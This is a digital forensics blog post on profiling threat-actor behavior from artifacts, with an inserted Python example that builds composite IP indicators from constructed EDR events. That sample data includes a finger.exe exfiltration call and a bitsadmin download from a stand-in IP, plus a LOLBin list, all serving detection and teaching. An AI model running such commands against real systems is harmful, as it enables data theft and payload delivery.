Thursday, May 23, 2024

Human Behavior In Digital Forensics

I've always been a fan of books or shows where someone follows clues and develops an overall picture that leads them to their end goal. I've always liked the "hot on the trail" mysteries, particularly when the clues are assembled in a way that makes it possible to understand what the antagonist was going to do next, what their next likely move would be. Interestingly enough, a lot of the shows I've watched have been centered around the FBI, shows like "The X-Files" and "Criminal Minds". I know intellectually that these shows are contrived, but assembling a trail of technical bread crumbs to develop a profile of human behavior is a fascinating idea, and something I've tried to bring to my work in DFIR.

Former FBI Supervisory Special Agent and Behavioral Profiler Cameron Malin recently shared that his latest endeavor, Modus Cyberandi, has gone live! The main focus of his effort, cyber behavior profiling, is right there at the top of the main web page. In fact, the main web page even includes a brief history of behavioral profiling.

This appears to be similar to Len Opanashuk's endeavor, Motives Unlocked, which leads me to wonder: is this a thing?

Is this something folks are interested in?

Apparently, it is, as there is research to suggest that this is, in fact, the case. Consider this research paper describing behavioral evidence analysis as a "paradigm shift", or this paper on idiographic digital profiling from the Journal of Digital Forensics, Security, and Law, to name but a few. Further, Google lists a number of (mostly academic) resources dedicated to cyber behavioral profiling.

This topic seems to be mentioned here and there, so maybe there is an interest in this kind of analysis, but the question is: is the interest mostly academic, is the focus more niche (law enforcement), or is this something that can be effectively leveraged in the private sector, particularly where digital forensics and intrusion intelligence intersect?

I ask the question because this is something I've looked at for some time now, in order not only to develop a better understanding of targeted threat actors who are still active during incident response, but also to determine the difference between a threat actor's actions during the response and those of the others involved (IT staff, responders, legitimate users of endpoints, etc.).

In a recent comment on social media, Cameron used the phrase "...adversary analysis and how human behavior renders in digital forensics...", and it occurred to me that this really does a great job of describing going beyond just individual data points and malware analysis in DFIR, particularly when it comes to hands-on targeted threat actors. By going beyond individual data points and looking at the multifaceted, nuanced nature of those artifacts, we can begin to discern patterns that tell us about the intent, sophistication, and situational awareness of the threat actor.

To that end, Joe Slowik has correctly stated that there is a need in CTI (and DFIR, SOC, etc.) to view indicators as composite objects, because things like hashes and IP addresses have greater value when other aspects of their nature are understood. Many times we tend to view IP addresses (and other indicators) one-dimensionally; however, there is much more about these indicators that can provide insight into the threat actor behind them, such as when, how, and in what context that IP address was used. Was it the source of a login, and if so, what type? Was it a C2 IP address, or the source of a download or upload? If so, how: via HTTP, curl, msiexec, BITS, etc.?

Here is an example of an IP address; in this case, we can get some insight into this IP address from VirusTotal, enough to know that we should probably pay attention. However, if you read the blog post, you will see that this IP address was used as the target for data exfiltration.

Via finger.exe.

Add to that the fact that the use of the LOLBin is identical to what was described in this 2020 advisory, and it should be easy to see that we have gone well beyond just an IP address by this point, as we have started to unlock and reveal the composite nature of that indicator.

The point of all this is that there is more to the data we have available than the one-dimensional perspective we are used to thinking in, through which we have been viewing that data. Now, if we begin to incorporate other data sources that are available to us (EDR telemetry, endpoint data and configurations, etc.), we will begin to see exactly how, as Cameron stated, human behavior renders in digital forensics. Some of the things I've pursued and been successful in demonstrating during previous engagements include hours of operation and preferred TTPs and approaches, enough so as to separate the actions of two different threat actors on a single endpoint.
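To make the "composite object" idea concrete, and to show how "hours of operation" falls out of the same data, here is an added Python example (mine, not the author's tooling) that folds constructed EDR-style events into one record per IP address: which hosts saw it, how it was used (logon type, LOLBin, or plain process), and the hours at which it was active. The log format, field names, hostnames and IP addresses are all invented for the illustration.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed telemetry for illustration, not from any real case: "<ISO time>|<host>|<event>|k=v;k=v"
SAMPLE_LINES = [
    "2024-05-20T02:14:07|WS01|logon|type=10;src=203.0.113.45;user=svc_backup",
    "2024-05-20T02:16:22|WS01|process|image=C:\\Windows\\System32\\finger.exe;cmd=finger user@203.0.113.45",
    "2024-05-20T03:05:40|WS02|netconn|dst=203.0.113.45:443;image=C:\\Windows\\System32\\msiexec.exe",
    "2024-05-20T14:30:11|WS01|netconn|dst=198.51.100.7:443;image=C:\\Program Files\\Browser\\browser.exe",
    "2024-05-21T01:58:03|WS02|process|image=C:\\Windows\\System32\\bitsadmin.exe;cmd=bitsadmin /transfer j http://203.0.113.45/x.dat",
]
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
LOLBINS = {"finger.exe", "msiexec.exe", "bitsadmin.exe", "curl.exe", "certutil.exe"}

def parse_line(line):
    """Split one constructed line into a record of timestamp, host, event and key=value fields."""
    ts, host, event, details = line.split("|", 3)
    fields = dict(kv.split("=", 1) for kv in details.split(";"))
    return {"ts": datetime.fromisoformat(ts), "host": host, "event": event, **fields}

def describe(rec):
    """Answer 'how, and in what context?' for one event: logon type, LOLBin, or plain image."""
    image = rec.get("image", "").rsplit("\\", 1)[-1].lower()
    if rec["event"] == "logon":
        return f"logon type {rec.get('type', '?')} as {rec.get('user', '?')}"
    if image in LOLBINS:
        return f"{rec['event']} via LOLBin {image}"
    return f"{rec['event']} via {image or 'unknown image'}"

def composite_indicators(lines):
    """Fold every event touching an IP into one composite object per IP:
    which hosts saw it, what it was used for, and at which hours (UTC) it was active."""
    out = defaultdict(lambda: {"hosts": set(), "contexts": set(), "hours": Counter()})
    for line in lines:
        rec = parse_line(line)
        for ip in set(IPV4.findall(line)):  # src=, dst=host:port, and IPs inside command lines
            c = out[ip]
            c["hosts"].add(rec["host"])
            c["contexts"].add(describe(rec))
            c["hours"][rec["ts"].hour] += 1
    return dict(out)

def off_hours_fraction(indicator, business=(8, 18)):
    """Share of this IP's activity outside business hours: a first cut at 'hours of operation'."""
    total = sum(indicator["hours"].values())
    outside = sum(n for h, n in indicator["hours"].items() if not business[0] <= h < business[1])
    return outside / total if total else 0.0
```

Calling `composite_indicators(SAMPLE_LINES)` turns the bare value 203.0.113.45 into "seen on two hosts, used for a type 10 logon, finger.exe, msiexec and BITS traffic, entirely outside business hours", which is the composite view the post argues for.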

I've also gained insight into the situational awareness of a threat actor by observing how they reacted to stimulus. During one incident, the installed EDR framework was blocking the threat actor's tools from executing on different endpoints. The threat actor never bothered to query any of the three endpoints to determine what was blocking their attempts; rather, on one endpoint, they attempted to disable Windows Defender. On the second endpoint, they attempted to delete a specific AV product without ever first determining whether it was installed on the endpoint; the batch file they ran to delete all components and versions of the product was not preceded by any query commands. Finally, on the third endpoint, the threat actor ran a "spray-and-pray" batch file that attempted to disable or delete a variety of products, none of which were actually installed on the endpoint. When none of these succeeded in allowing them to pursue their goals, they left.

So, yes, viewed through the right lens, with the right perspective, human behavior can be discerned through digital forensics. But the question remains: is this useful? Is the insight that this approach provides valuable to anyone?


